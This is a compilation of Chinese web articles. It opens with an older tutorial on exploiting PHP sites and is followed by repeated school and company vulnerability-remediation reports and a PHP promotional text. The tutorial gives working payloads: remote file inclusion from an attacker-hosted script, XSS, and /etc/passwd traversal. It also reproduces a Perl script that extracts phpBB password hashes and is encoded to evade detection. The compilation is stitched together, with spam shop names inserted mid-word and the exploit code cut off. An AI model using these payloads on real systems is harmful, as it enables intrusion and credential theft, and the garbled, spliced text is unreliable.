PHP网站漏洞的相关总结

第一篇：PHP网站漏洞的相关总结

PHP网站漏洞的相关总结

NB联盟-zwell 从现在的网络安全来看,大家最关注和接触最多的WEB页面漏洞应该是ASP了,在这方面,小竹是专家,我没发言权.然而在PHP方面来看,也同样存在很严重的安全问题,但是这方面的文章却不多.在这里,就跟大家来稍微的讨论一下PHP页面的相关漏洞吧.我对目前常见的PHP漏洞做了一下总结,大致分为以下几种:包含文件漏洞,脚本命令执行漏洞,文件泄露漏洞,SQL注入漏洞等几种.当然,至于COOKIE欺骗等一部分通用的技术就不在这里讨论了,这些资料网上也很多.那么,我们就一个一个来分析一下怎样利用这些漏洞吧!首先,我们来讨论包含文件漏洞.这个漏洞应该说是PHP独有的吧.这是由于不充分处理外部提供的恶意数据,从而导致远程攻击者可以利用这些漏洞以WEB进程权限在系统上执行任意命令.我们来看一个例子:假设在a.php中有这样一句代码: 在这段代码中,$include一般是一个已经设置好的路径,但是我们可以通过自己构造一个路径来达到攻击的目的.比方说我们提交:a.php?include=http://web/b.php,这个web是我们用做攻击的空间,当然,b.php也就是我们用来攻击的代码了.我们可以在b.php中写入类似于:passthru(“/bin/ls /etc”);的代码.这样,就可以执行一些有目的的攻击了.(注:web服务器应该不能执行php代码,不然就出问题了.相关详情可以去看<<如何对PHP程序中的常见漏洞进行攻击>>).在这个漏洞方面,出状况的很多,比方说:PayPal Store Front, HotNews,Mambo Open Source,PhpDig,YABB SE,phpBB,InvisionBoard,SOLMETRA SPAW Editor,Les Visiteurs,PhpGedView,X-Cart等等一些.接着,我们再来看一下脚本命令执行漏洞.这是由于对用户提交的URI参数缺少充分过滤，提交包含恶意HTML代码的数据，可导致触发跨站脚本攻击，可能获得目标用户的敏感信息。我们也举个例子:在PHP Transparent的PHP PHP 4.3.1以下版本中的index.php页面对PHPSESSID缺少充分的过滤,我们可以通过这样的代码来达到攻击的目的: http://web/index.php?PHPSESSID=“>在script里面我们可以构造函数来获得用户的一些敏感信息.在这个漏洞方面相对要少一点,除了PHP Transparent之外还有:PHP-Nuke,phpBB,PHP Classifieds,PHPix,Ultimate PHP Board等等.再然后,我们就来看看文件泄露漏洞了.这种漏洞是由于对用户提交参数缺少充分过滤，远程攻击者可以利用它进行目录遍历攻击以及获取一些敏感信息。我们拿最近发现的phpMyAdmin来做例子.在phpMyAdmin中,export.php页面没有对伟创电脑维修用户提交的'what'参数进行充分过滤,远程攻击者提交包含多个'../'字符的数据，便可绕过WEB ROOT限制，以WEB权限查看系统上的任意文件信息。比方说打入这样一个地址:export.php?what=../../../../../../etc/passwd%00 就可以达到文件泄露的目的了.在这方面相对多一点,有:myPHPNuke,McNews等等.最后,我们又要回到最兴奋的地方了.想想我们平时在asp页面中用SQL注入有多么爽,以前还要手动注入,一直到小竹悟出”SQL注入密笈“(嘿嘿),然后再开做出NBSI以后,我们NB联盟真是拉出一片天空.曾先后帮CSDN,大富翁论坛,中国频道等大型网站找出漏洞.(这些废话不多说了,有点跑题了...).还是言规正传,其实在asp中SQL的注入和php中的SQL注入大致相同,只不过稍微注意一下用的几个函数就好了.将asc改成ASCII,len改成LENGTH,其他函数基本不变了.其实大家看到PHP的SQL注入,是不是都会想到PHP-NUKE和PHPBB呢?不错,俗话说树大招分,像动网这样的论坛在asp界就该是漏洞这王了,这并不是说它的论坛安全太差,而是名气太响,别人用的多了,研究的人也就多了,发现的安全漏洞也就越多了.PHPBB也是一样的,现在很大一部分人用PHP做论坛的话,一般都是选择了PHPBB.它的漏桂林伟创电脑洞也是一直在出,从最早phpBB.com phpBB 1.4.0版本被人发现漏洞,到现在最近的phpBB 2.0.6版本的groupcp.php,以及之前发现的search.php,profile.php,viewtopic.php等等加起来,大概也有十来个样子吧.这也一直导致,一部分人在研究php漏洞的时候都会拿它做实验品,所谓百练成精嘛,相信以后的PHPBB会越来越好.好了,我们还是来分析一下漏洞产生的原因吧.拿viewtopic.php页面来说,由于在调用viewtopic.php时，直接从GET请求中获得”topic_id“并传递给SQL查询命令,而并没有进行一些过滤的处理,攻击者可以提交特殊的SQL字符串用于获得MD5密码，获得此密码信息可以用于自动登录或者进行暴力破解。(我想应该不会有人想去暴力破解吧,除非有特别重要的原因).先看一下相关源代码: # if(isset($HTTP_GET_VARS[POST_TOPIC_URL]))# { # $topic_id = intval($HTTP_GET_VARS[POST_TOPIC_URL]);# } # else if(isset($HTTP_GET_VARS['topic']))# { # $topic_id = intval($HTTP_GET_VARS['topic']);# } 从上面我们可以看出,如果提交的view=newest并且sid设置了值的话,执行的查询代码像下面的这个样子(如果你还没看过PHPBB源代码的话,建议你看了再对着这里来看,受影响系统为:phpBB 2.0.5和phpBB 2.0.4).# $sql = ”SELECT p.post_id # FROM “.POSTS_TABLE.” p, “.SESSIONS_TABLE.” s, “.USERS_TABLE.” u # WHERE s.session_id = '$session_id' # AND u.user_id = s.session_user_id # AND p.topic_id = $topic_id # AND p.post_time >= u.user_lastvisit # ORDER BY p.post_time ASC # LIMIT 1“;Rick提供了下面的这断测试代码: use IO::Socket;$remote = shift || 'localhost';$view_topic = shift || '/phpBB2/viewtopic.php';$uid = shift || 2;$port = 80;$dbtype = 'mysql4';# mysql4 or pgsql print ”Trying to get password hash for uid $uid server $remote dbtype: $dbtypen“;$p = ”“;for($index=1;$index<=32;$index++){ $socket = IO::Socket::INET->new(PeerAddr => $remote, PeerPort => $port, Proto => ”tcp“, Type => SOCK_STREAM)or die ”Couldnt connect to $remote:$port : $@n“;$str = ”GET $view_topic“.”?sid=1&topic_id=-1“.random_encode(make_dbsql()).”&view=newest“.” HTTP/1.0nn“;print $socket $str;print $socket ”Cookie: phpBB2mysql_sid=1n“;# replace this for pgsql or remove it print $socket ”Host: $remotenn“;while($answer = <$socket>){ if($answer =~ /location:.*x23(d+)/)# Matches the location: viewtopic.php?p=# { $p.= chr($1);} } close($socket);} print ”nMD5 Hash for uid $uid is $pn“;# random encode str.helps avoid detection sub random_encode { $str = shift;$ret = ”“;for($i=0;$i>).还有一点我觉得很多网站都会有这个问题,就是没有关错误显示.轻一看可能没什么,但是一些盯了很久(用词有点不对哦)的人就可以通过错误提示来获得如数据库信息,网页文件物理路径等等.以上都是我个人的一些观点,如果你有什么看法,可以与我们联系,大家在一起讨论吧。

第二篇：网站漏洞整改报告

网站安全整改报告

收到教育局中心机房发来的网站安全漏洞检测报告，对被检测的域名地址进行确认，我校主要近阶段处在新旧网站交替时期，旧网站还没有退役，新网站也已上线。被检测的存在漏洞的地址为我校原网站域名地址。我校安全领导小组马上召开了紧急会议。经会议商讨决定，作出以下几点整改措失：

1.关闭旧网站；

2.加固原网站服务器及其他内部服务器，对服务器进进漏洞扫瞄，系统漏洞修补完毕；

3.对于新网站，此次虽然未进行检测，但从兄弟学校的网站检测报告来看（同开发单位），应该存在漏洞。会后马上联系开发单位进行检测整改。

反思及下一步工作

（一）反思

1.网站开发时，只考虑了网站的功能使用，没有考虑网站安全问题。

2.学校自己技术力量薄弱，对安全检测有一定难度。

（二）下一步工作

1． 加强对服务器安全的管理，每月使用扫描工具对所有服务器进行日常扫描监控，并安装好补丁。

2015/12/05

第三篇：网站漏洞整改报告

安全整改报告

整改情况

1.相关单位收到加固通知后，对IP地址进行确认，存在漏洞的地址均为集团客户MAS机服务器地址。

2.相关单位维护人员到集团客户现场对所有MAS设备进行了检查并对相应的设备安装了Apache Struts漏洞补丁，并将整改结果反馈至省公司。

3.经验证，所有MAS设备已完成加固，漏洞修补完毕。

三、反思及下一步工作

（一）反思

1.业务系统上线前，并没有做到有效地安全加固工作。2.集团客户安全意识薄弱，MAS机加固工作存在一定难度。

（二）下一步工作

1． 加强对MAS服务器安全的管理，每月使用扫描工具对所有MAS进行日常扫描监控，同时对新增MAS服务器做好检查并安装好补丁。

2.对于新增MAS，做好完整的安全加固工作。后续每月对每一台服务器做好检查并安装好补丁，把安全问题降到最低。

第四篇：网站漏洞整改报告

安全整改报告

整改情况 1.相关单位收到加固通知后，对ip地址进行确认，存在漏洞的地址均为集团客户mas机服务器地址。2.相关单位维护人员到集团客户现场对所有mas设备进行了检查并对相应的设备安装了apache struts漏洞补丁，并将整改结果反馈至省公司。3.经验证，所有mas设备已完成加固，漏洞修补完毕。

三、反思及下一步工作

（一）反思

1.业务系统上线前，并没有做到有效地安全加固工作。2.集团客户安全意识薄弱，mas机加固工作存在一定难度。

（二）下一步工作 1． 加强对mas服务器安全的管理，每月使用扫描工具对所有mas进行日常扫描监控，同时对新增mas服务器做好检查并安装好补丁。2.对于新增mas，做好完整的安全加固工作。后续每月对每一台服务器做好检查并安装好补丁，把安全问题降到最低。篇二：网站漏洞整改报告

网站漏洞整改报告

按照国家《中华人民共和国计算机信息系统安全保护条例》、《计算机信息网络国际联网安全保护管理办法》、《互联网安全保护技术措施规定》等有关法律法规规定，全面落实互联网安全保护制度和安全保护技术措施，对网站、信息安全进行了严格漏洞安全检查工作。

本次网站安全检查是完全站在攻击者角度，模拟黑客可能使用的攻击技术和漏洞发现技术进行的安全性测试，通过结合多方面的攻击技术进行测试，发现本校个别网站系统存在比较明显的可利用的安全漏洞，针对已存在漏洞的系统需要进行重点加固。本次检查结果和处理方案如下: 篇三：网站漏洞整改报告

网站安全整改报告

收到教育局中心机房发来的网站安全漏洞检测报告，对被检测的域名地址进行确认，我校主要近阶段处在新旧网站交替时期，旧网站还没有退役，新网站也已上线。被检测的存在漏洞的地址为我校原网站域名地址。我校安全领导小组马上召开了紧急会议。经会议商讨决定，作出以下几点整改措失： 1.关闭旧网站；

2.加固原网站服务器及其他内部服务器，对服务器进进漏洞扫瞄，系统漏洞修补完毕； 3.对于新网站，此次虽然未进行检测，但从兄弟学校的网站检测报告来看（同开发单位），应该存在漏洞。会后马上联系开发单位进行检测整改。

反思及下一步工作

（一）反思

1.网站开发时，只考虑了网站的功能使用，没有考虑网站安全问题。2.学校自己技术力量薄弱，对安全检测有一定难度。

（二）下一步工作 1． 加强对服务器安全的管理，每月使用扫描工具对所有服务器进行日常扫描监控，并安装好补丁。2015/12/05 1篇四：网站安全隐患整改报告 xxx网站安全隐患整改报告 xxx市公安局xxx分局：

自2015年6月11日接到xxx市公安局xxx分局下发的《政府网站安全隐患告知书》后，我公司技术部组织人力，针对检查后发现的问题，迅速修补安全漏洞，并对所属网站进行彻底检查，进一步完善安全防范措施，提高网络安全防范意识，有效增强了xxxxxx网站对有害信息的防范能力和防泄密水平。现将整改情况告知如下：

一、完成问题整改 针对通知附件的检测结果，我公司网站在防sql注入等方面存在一些问题。针对以上问题，我公司技术部组织大量技术人员，检测了整个网站的防注入隐患，制订了新的地址过滤算法，完成了完成了网页地址过滤等工作。

二、进一步提高网络与信息安全工作水平

一是加强理论知识学习。建立学习制度，每半个月组织部门工作人员及专业技术人员，学习网络安全知识及网络信息保密的相关法律法规。通过学习，全面提高工作人员网络安全知识水平，尤其是在网络新病毒、网站新漏洞等网络安全技术方面，做到及时沟通、信息共享。

二是加强网络与信息安全管理。通过“责任落实到人，工作落实到纸”的方法，全面加强网络与信息安全管理工作。我们设立了网站服务器安全员、机房管理员、网站检测员、网站后台技术员等，把责任具体到人，同时要求，各责任岗位要随时做好工作记录，各项工作最终落实到纸面。通过以上工作，我公司网站网络信息安全管理水平得到整体提高。

三是建立健全信息网络安全制度。在工作中，进一步细化工作程序，建立各项工作制度。完善了服务器数据定期备份制度、网络信息发布签审制度等。通过完善各类制度，使网络安全信息工作有章可循，为做好xxxxxx网站信息网络安全工作，奠定了坚实的基础。

在今后的工作中，我们将进一步加强学习，严格管理，完善制度，努力提升xxxxxx网站信息网络安全工作水平。2015年6月12日篇五：南宁四十二中网站整改报告

南宁市第四十二中学关于2014年

网站与信息安全检查整改报告 南宁市网络与信息安全信息通报中心： 3月6日贵单位对我校网站进行信息安全保障工作进行监督检查后，发现我校网站存在信息安全漏洞。按照贵校要求，我校派遣专人到贵校领取了《南宁市第四十二中学网站检测报告》，并对照相关要求，针对我校网站认真组织开展了自查整改。现将自查整改情况报告如下：

一、网站信息安全状况总体评价

我校在检查结果的基础上，认真进行整改，信息安全工作取得了新的进展，一是在制度上更加健全；二是在人员落实上更加明确；三是在保密意识有所提高。

二、信息安全主要整改情况

（一）信息安全组织管理

成立了信息系统安全工作领导小组。明确了信息系统安全工作的责任领导和具体管护人员。按照信息安全工作要求上制定了信息安全工作计划或工作方案。建立了信息安全责任制。按责任规定:信息安全工作领导小组对信息安全负首责，主管领导负总责，具体管理人负主责，并在单位组织开展信息安全教育培训。

（二）日常信息安全管理

严格落实岗位责任制和保密责任制，托管网站的服务器

安装必要的办公软件和应用软件外，不安装与工作无关的软件；定期维护服务器。

（三）信息安全防护管理 1．网络边界防护管理。

关闭不必要的应用、服务、端口；定期更新账户口令；定期清理病毒木马，使用安全站长联盟平台、百度云加速乐防护检测、360网站安全技术工具定期进行漏洞扫描、病毒木马检测，并根据相应的提示进行修复，查杀木马，添置天融信硬件防火墙，并进行有效配置设备安全策略；使用安全设备防病毒、防火墙、入侵检测。2．门户网站安全管理。

管理系统管理账户和口令，清理无关账户，防止出现空口令、弱口令和默认口令；关闭不必要的端口，停止不必要的服务和应用，删除不必要的链接和插件；删除临时文件，防止敏感信息泄露；建立信息发布审核制度；使用技术工具定期进行漏洞扫描、木马检测。3.移动存储设备安全管理。

托管网站的服务器不允许使用移动存储设备。

（四）信息安全应急管理

制定信息安全应急预案并进行演练培训。明确了应急技术支援队伍。重要数据和重要信息系统备份。

三、整改后取得的成效

我校领导高度重视，把信息安全检查工作列入了重要议事日程，并及时成立了信息安全工作领导小组，明确了检查责任人，组织制定了检查工作计划和检查方案，对检查工作进行了安排部署，确保了检查工作的顺利进行。

整改之后我校信息系统得到了更好的维护，经过整改，目前经安全站长联盟平台、百度云加速乐防护检测、360网站安全技术工具多款工具检测，均未发现相关危险漏洞，木马等。

严格按照相关监管部门的要求，积极完善各项安全制度、充分加强信息化安全工作人员教育培训、全面落实安全防范措施、全力保障信息安全工作经费，信息安全风险得到有效降低，应急处置能力得到切实提高，保证了我校网站持续安全稳定运行。

第五篇：PHP建设网站的优势

深圳五洲科创科技有限公司网址：//

PHP建设网站的优势

PHP建设网站的优势

一、跨平台特性：

PHP语言可以运行于Linux、FreeBSD、OpenBSD、Solaris Unix、AIX、Darwin、Windows等多种操作系统，通常说的LAMP指的就是Linux、Apache、MySQL、PHP/Perl/Python。

PHP建设网站的优势

二、数据库支持：

PHP支持多种主流与非主流的数据库，如：、Adabas D、DBA、dBase、dbm、filePro、Informix、InterBase、mSQL、MySQL、Microsoft SQL Server、Solid、Sybase、ODBC、oracle、oracle

8、PostgreSQL等。PHP建设网站的优势

三、安全性：

加密支持，PHP4实现了完整的加密, 这些加密功能是一个完整的mycrypt库，并且 PHP 4.0 支持哈希函数。Blowfish，TripleDES,MD5,并且SHA1 也是可使用的一些加密算法。使用PHP语言运行Linux、FreeBSD、OpenBSD、Solaris Unix操作系统，不需安装任何杀毒软件及补丁，安全可靠.PHP建设网站的优势

四、扩展性：

扩充了API 模块：PHP 4.0 为扩展的 API 模块的提供了扩展PHP接口模块,认为它比旧的 API 版本显著地快。PHP 模块已有的及最常用的接口多数被转换到使用这个扩展的接口;另外，PHP属于开源软件，其源代码完全公开，任何程序员为PHP扩展附加功能非常容易使PHP有很好的发展空间和扩展性.PHP建设网站的优势

五、执行速度快：

PHP是一种强大的CGI脚本语言，语法混合了C、Java、Perl和PHP式的新语法，执行网页比CGI、Perl和ASP更快，这是它的第一个突出的特点;内存方面，PHP 4.0 能更有效的使用内存, 导致较少的内存占用消耗,这主要归功于引用计数技术的实现。

PHP建设网站的优势

六、可移植性：

PHP 写出来的 Web 后端 CGI 程序，可以很轻易的移植到不同的操作系统上。例如，先以 Linux 架的网站，在系统负荷过高时，可以快速地将整个系统移到 SUN 工作站上，不用重新编译 CGI 程序。面对快速发展的 Internet，这是长期规划的最好选择。

PHP建设网站的优势

七、功能全面性：

PHP包括图形处理、编码与解码、压缩文件处理、XML解析、支持HTTP的身份认证、Cookie、POP3、SNMP等。可以利用PHP连接包括Oracle，MS-Access，Mysql在内的大部分数据库。从对象式的设计、结构化的特性、数据库的处理、网络接口应用、安全编码机制等，PHP几乎涵盖了所有网站的一切功能。

可伸缩性。传统上网页的交互作用是通过CGI来实现的。CGI程序的伸缩性不很理想，因为它为每一个正在运行的CGI程序开一个独立进程。解决方法就是将经常用来编写CGI程序的语言的解释器编译进web服务器(比如mod_perl,JSP)，PHP就可以以这种方式安装。内嵌的PHP可以具有更高的可伸缩性。

深圳五洲科创科技有限公司网址：//

9.要发挥php语言的优势，Linux+Apache+MySQL+PHP.被称为“黄金组合”。

10、国内排名前十名的网站中使用PHP的有8家：百度、腾讯网、新浪、搜狐、网易、淘宝、雅虎中国、Tom在线，易趣(ebay)。国内近两年新推出的web2.0网站中，有80%使用PHP开发。Alexa中文网站500强中，394家以上的网站应用着PHP技术.PHP不会像因为被合作商限制、更多的免费及共享的特性大大降低使用的成本及扩展性。

参考：深圳五洲科创科技有限公司

网址：http://